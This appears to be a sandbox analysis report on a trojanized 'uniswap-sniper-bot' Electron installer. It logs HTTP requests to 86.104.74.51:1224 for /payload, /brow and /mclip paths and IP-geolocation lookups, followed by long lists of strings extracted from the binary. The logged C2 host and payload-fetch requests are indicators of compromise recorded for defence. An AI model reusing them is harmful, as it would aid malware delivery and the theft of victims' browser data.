e7 7e ee e7 7f 3f ef f5 af f7 ba f6 ef ba fc 31 bf 3d 33 6b d6 5a 33 b3 66 cd 5a 6b c6 da 2d a6 19 ec 0c 06 43 22 fd fb fe dd 60 d8 63 88 7d 2a 1b fe af 1f 87 04 06 43 ea 9c fb 52 1b 76 24 3f 9b 6b 4f 02 af b3 b9 1a 75 ed d6 cf a9 77 5f df 2e 7d db f5 74 ea d0 ae 57 2f 5f 3f a7 f6 9d 9c fa f6 ef e5 d4 ad 97 53 b5 ba 0d 9d 7a fa 76 ec 54 24 55 aa 14 a6 38 18 b7 df dd 6d b7 78 e6 d4 e2 f1 ff 66 3f cf 56 3c 40 7f bf bf 9c 62 5e 68 fd 3b c9 3c c3 fa d7 62 9e 63 fd 3b d9 fc b7 b5 ec 94 e2 06 fd f5 7a 34 c5 3c 53 7f 3f eb f7 51 d6 bf 16 f3 a3 d9 fc 9d 6a 5e 64 fd ee 5d 3c f6 6f 80 f5 bb 41 b7 0e 5d 69 e7 df d1 54 af ba c1 d0 71 5c 32 43 cf 45 df da c7 ff 16 6d c8 ed 64 9f 30 b5 93 e1 82 b0 be 66 b4 fe b6 36 0d 0c b0 26 47 24 30 c4 a5 13 1a 0c 49 ac 3f fd fc 6b 88 2e 61 65 ee a8 a2 25 95 ed 9d 20 be 52 fc 9f 7f fd 8e 4b 76 2d 6a c8 d8 35 a1 21 a2 40 09 43 65 1a f0 2e 61 18 02 50 ef e2 86 e8 59 fa a1 45 09 83 77 7e 7d f7 2e 61 08 ae 6b 30 44 44 14 32 b8 19 fe fd e3 7d a7 50 2c 9c f8 c7 a9 84 21 22 c5 bf 2f 5f c4 af 93 bf 9f fe ce 3c 67 8a 45 08 da 13 fd 5e c6 49 60 8b f4 ed d8 ce af 9d c1 90 31 3a a5 90 50 99 d7 fa 7b c5 14 5b e0 e7 58 aa 5c 24 b6 98 21 d7 20 bd 22 8a 19 0c 85 f4 f7 58 b1 7f 96 0b 2c d2 3b b6 e0 8e c3 09 ac b4 1a 02 f5 f7 f5 bf 94 ab 5c a4 5b 6c b9 36 ce b1 b4 18 68 72 9b f9 5f cb b9 ba 76 e8 dc c5 60 e8 0f ed f5 4a 58 fb c8 70 ed bf 28 d7 b7 5f df 0e 06 43 1c 8f 55 2e 99 fe de f8 af ca 75 f2 f1 55 c1 77 fe b1 bc 37 58 e9 f9 97 72 55 0c ff 87 3c 67 78 22 77 dd 4f 61 88 bc 5b d3 de 10 39 64 70 46 43 e4 c0 be a9 0d 91 47 aa 38 18 22 37 ee 70 36 44 7a 2c 49 6f 88 74 2e 9b d6 10 99 ba 72 26 43 64 f2 a9 09 0c 91 3b 92 39 1a 22 73 e6 cb 6d 88 4c b1 5d bf 85 ac 55 e1 2d 59 13 1a 22 07 87 3b 19 22 57 35 c9 60 88 bc 38 50 a0 42 dd 04 f9 78 82 5c 86 c8 84 d1 59 0c 91 85 a7 19 0d 91 2e 2b 95 72 be 9a d2 10 d9 e6 9b c0 7f 6c a1 c2 c1 73 f4 5a 9c 5a e5 26 d5 54 aa 7a 1a a5 02 a7 a8 5c 8f 5b 7a 75 8e d2 67 d0 97 ec 86 c8 2f Data Ascii: PK$V.pyp/PKV.py

Source: global traffic	HTTP traffic detected: GET /ajax/libs/materialize/1.0.0/css/materialize.min.css HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: " Not A;Brand";v="99", "Chromium";v="102"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) uniswap-sniper-bot-with-gui/1.0.0 Chrome/102.0.5005.167 Electron/19.1.9 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,/;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleAccept-Encoding: gzip, deflate, brAccept-Language: en-GB
Source: global traffic	HTTP traffic detected: GET /pdown HTTP/1.1Host: 86.104.74.51:1224User-Agent: curl/7.83.1Accept: /
Source: global traffic	HTTP traffic detected: GET /client/7/702 HTTP/1.1host: 86.104.74.51:1224Connection: close
Source: global traffic	HTTP traffic detected: GET /payload/7/702 HTTP/1.1Host: 86.104.74.51:1224User-Agent: python-requests/2.31.0Accept-Encoding: gzip, deflateAccept: /Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /brow/7/702 HTTP/1.1Host: 86.104.74.51:1224User-Agent: python-requests/2.31.0Accept-Encoding: gzip, deflateAccept: /Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /json HTTP/1.1Host: ip-api.comUser-Agent: python-requests/2.31.0Accept-Encoding: gzip, deflateAccept: /Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /mclip/7/702 HTTP/1.1Host: 86.104.74.51:1224User-Agent: python-requests/2.31.0Accept-Encoding: gzip, deflateAccept: /Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /json HTTP/1.1Host: ip-api.comUser-Agent: python-requests/2.31.0Accept-Encoding: gzip, deflateAccept: /Connection: keep-alive

Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895700933.0000000006120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: [yt_channel]: <https://www.youtube.com/channel/UCdRihNiJ0tJ7xpFGKcwZcdQ> equals www.youtube.com (Youtube)
Source: uniswap-sniper-bot-with-gui.exe, 00000008.00000000.2096036514.00007FF6D6313000.00000002.00000001.01000000.0000000D.sdmp	String found in binary or memory: V8.MemoryHeapUsedV8.MemoryHeapCommittedmail.google.com.gmaildrive.google.com.docsplus.google.com.plusinbox.google.com.inboxcalendar.google.com.calendarwww.youtube.com.youtube.top10sina.com.cnfacebook.combaidu.comqq.comtwitter.comtaobao.comlive.com equals www.youtube.com (Youtube)
Source: uniswap-sniper-bot-with-gui.exe, 00000008.00000000.2096036514.00007FF6D5728000.00000002.00000001.01000000.0000000D.sdmp	String found in binary or memory: chttps://www.baidu.com/s?ie={inputEncoding}&wd={searchTerms}https://www.baidu.com/s?ie={inputEncoding}&word={searchTerms}https://www.baidu.com/{google:pathWildcard}/s?ie={inputEncoding}&word={searchTerms}{google:baseURL}#q={searchTerms}{google:baseURL}search#q={searchTerms}{google:baseURL}webhp#q={searchTerms}{google:baseURL}s#q={searchTerms}{google:baseURL}s?q={searchTerms}https://go.mail.ru/msearch?q={searchTerms}&{mailru:referralID}https://m.so.com/s?ie={inputEncoding}&q={searchTerms}https://m.so.com/index.php?ie={inputEncoding}&q={searchTerms}https://m.sogou.com/web/{google:pathWildcard}?ie={inputEncoding}&keyword={searchTerms}http://searchatlas.centrum.cz/?q={searchTerms}http://hladaj.atlas.sk/fulltext/?phrase={searchTerms}http://isearch.avg.com/search?q={searchTerms}http://search.avg.com/route/?q={searchTerms}&lng={language}https://isearch.avg.com/search?q={searchTerms}https://search.avg.com/route/?q={searchTerms}&lng={language}http://search.babylon.com/?q={searchTerms}http://search.conduit.com/Results.aspx?q={searchTerms}http://www.delfi.lt/paieska/?q={searchTerms}http://www.delta-search.com/?q={searchTerms}http://www1.delta-search.com/home?q={searchTerms}http://www1.delta-search.com/?q={searchTerms}http://www2.delta-search.com/home?q={searchTerms}http://www2.delta-search.com/?q={searchTerms}http://www.search.delta-search.com/home?q={searchTerms}http://www.search.delta-search.com/?q={searchTerms}http://www.yhs.delta-search.com/home?q={searchTerms}http://www.yhs.delta-search.com/?q={searchTerms}http://mixidj.delta-search.com/home?q={searchTerms}http://mixidj.delta-search.com/?q={searchTerms}http://search.goo.ne.jp/web.jsp?MT={searchTerms}&IE={inputEncoding}http://search.goo.ne.jp/sgt.jsp?MT={searchTerms}&CL=plugin&FM=json&IE={inputEncoding}http://search.iminent.com/SearchTheWeb/v6/1033/homepage/Default.aspx#q={searchTerms}http://search.iminent.com/SearchTheWeb/v6/1033/homepage/Result.aspx#q={searchTerms}http://start.iminent.com/?q={searchTerms}http://start.iminent.com/StartWeb/1033/homepage/#q={searchTerms}http://search.incredibar.com/?q={searchTerms}http://mystart.incredibar.com/?search={searchTerms}https://www.neti.ee/cgi-bin/otsing?query={searchTerms}&src=webhttps://www.neti.ee/api/suggestOS?suggestVersion=1&suggestQuery={searchTerms}https://nova.rambler.ru/search?query={searchTerms}https://nova.rambler.ru/suggest?v=3&query={searchTerms}http://www.search-results.com/web?q={searchTerms}http://search.snap.do/?q={searchTerms}http://feed.snapdo.com/?q={searchTerms}http://feed.snap.do/?q={searchTerms}http://en.softonic.com/s/{searchTerms}http://www.softonic.com/s/{searchTerms}http://www.softonic.com.br/s/{searchTerms}http://buscador.softonic.com/?q={searchTerms}http://nl.softonic.com/s/{searchTerms}https://search.softonic.com/?q={searchTerms}https://en.softonic.com/s/{searchTerms}https://www.softonic.com/s/{searchTerms}https://www.softonic.com.br/s/{searchTerms}https://buscador.softonic.com/?q={searchTerms}https://nl.softonic.com/s/{searchTer
Source: uniswap-sniper-bot-with-gui.exe, 00000008.00000000.2096036514.00007FF6D6313000.00000002.00000001.01000000.0000000D.sdmp	String found in binary or memory: www.youtube.com equals www.youtube.com (Youtube)

Source: global traffic	DNS traffic detected: DNS query: cdnjs.cloudflare.com
Source: global traffic	DNS traffic detected: DNS query: chrome.cloudflare-dns.com
Source: global traffic	DNS traffic detected: DNS query: ip-api.com
Source: global traffic	DNS traffic detected: DNS query: www.python.org

Source: unknown

HTTP traffic detected: POST /dns-query HTTP/1.1Host: chrome.cloudflare-dns.comConnection: keep-aliveContent-Length: 128Accept: application/dns-messageAccept-Language: *User-Agent: ChromeAccept-Encoding: identityContent-Type: application/dns-message

Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895700933.0000000006120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://2x.io)
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1903256672.0000000006020000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/1085
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1903256672.0000000006020000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/1452
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1903256672.0000000006020000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/1452expand_integer_pow_expressionsThe
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1903256672.0000000006020000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/1512
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1903256672.0000000006020000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/1637
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1903256672.0000000006020000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/1936
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1903256672.0000000006020000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/2046
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1903256672.0000000006020000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/2152
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1903256672.0000000006020000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/2152skip_vs_constant_register_zeroIn
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1903256672.0000000006020000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/2162
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1903256672.0000000006020000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/2273
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1903256672.0000000006020000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/2517
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1903256672.0000000006020000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/2727
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1903256672.0000000006020000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/2894
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1903256672.0000000006020000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/2970
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1903256672.0000000006020000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/2978
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1903256672.0000000006020000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3027
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1903256672.0000000006020000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3045
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1903256672.0000000006020000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3078
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1903256672.0000000006020000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3153
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1903256672.0000000006020000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3205
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1903256672.0000000006020000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3206
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1903256672.0000000006020000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3243
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1903256672.0000000006020000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3246
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1903256672.0000000006020000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3246allow_clear_for_robust_resource_initSome
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1903256672.0000000006020000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3452
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1903256672.0000000006020000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3498
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1903256672.0000000006020000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3502
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1903256672.0000000006020000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3577
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1903256672.0000000006020000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3584
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1903256672.0000000006020000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3586
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1903256672.0000000006020000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3623
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1903256672.0000000006020000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3624
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1903256672.0000000006020000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3625
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1903256672.0000000006020000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3682
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1903256672.0000000006020000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3682allowES3OnFL10_0Allow
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1903256672.0000000006020000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3729
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1903256672.0000000006020000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3965
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1903256672.0000000006020000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3970
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1903256672.0000000006020000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3997
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1903256672.0000000006020000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/4214
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1903256672.0000000006020000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/4267
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1903256672.0000000006020000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/4324
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1903256672.0000000006020000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/4339
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1903256672.0000000006020000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/4384
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1903256672.0000000006020000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/4405
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1903256672.0000000006020000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/4428
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1903256672.0000000006020000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/4551
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1903256672.0000000006020000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/4633
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1903256672.0000000006020000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/4646
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1903256672.0000000006020000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/4722
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1903256672.0000000006020000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/4722forceRobustResourceInitForce-enable
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1903256672.0000000006020000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/482
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1903256672.0000000006020000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/4836
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1903256672.0000000006020000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/4889
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1903256672.0000000006020000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/4901
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1903256672.0000000006020000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/4937
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1903256672.0000000006020000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5007
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1903256672.0000000006020000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5007disable_anisotropic_filteringDisable
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1903256672.0000000006020000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5055
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1903256672.0000000006020000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5061
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1903256672.0000000006020000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5281
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1903256672.0000000006020000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5371
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1903256672.0000000006020000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5375
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1903256672.0000000006020000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5421
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1903256672.0000000006020000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5430
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1903256672.0000000006020000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5469
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1903256672.0000000006020000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5535
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1903256672.0000000006020000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5577
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1903256672.0000000006020000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5658
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1903256672.0000000006020000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5658GPU.ANGLE.DisplayInitializeMSFrontend
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1903256672.0000000006020000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5750
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1903256672.0000000006020000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5750enableCompressingPipelineCacheInThreadPoolEnable
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1903256672.0000000006020000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5901
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1903256672.0000000006020000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6041
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1903256672.0000000006020000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6041forceInitShaderVariablesForce-enable
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1903256672.0000000006020000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6048
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1903256672.0000000006020000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6141
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1903256672.0000000006020000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6248
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1903256672.0000000006020000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6439
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1903256672.0000000006020000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6651
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1903256672.0000000006020000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6692
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1903256672.0000000006020000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6755
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1903256672.0000000006020000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6860
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1903256672.0000000006020000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6878
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1903256672.0000000006020000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6929
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1903256672.0000000006020000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7046
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895700933.0000000006120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://bclary.com/2004/11/07/#a-13.2.2
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895700933.0000000006120000.00000004.00001000.00020000.00000000.sdmp, uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895276586.0000000005720000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://blog.izs.me/)
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1903256672.0000000006020000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crbug.com/1094869
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1903256672.0000000006020000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crbug.com/110263
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1903256672.0000000006020000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crbug.com/1144207
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1903256672.0000000006020000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crbug.com/1165751
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1903256672.0000000006020000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crbug.com/1165751Disable
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1903256672.0000000006020000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crbug.com/1171371
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1903256672.0000000006020000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crbug.com/1181068
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1903256672.0000000006020000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crbug.com/1181193
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1903256672.0000000006020000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crbug.com/308366
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1903256672.0000000006020000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crbug.com/403957
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1903256672.0000000006020000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crbug.com/550292
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1903256672.0000000006020000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crbug.com/565179
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1903256672.0000000006020000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crbug.com/642227
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1903256672.0000000006020000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crbug.com/642605
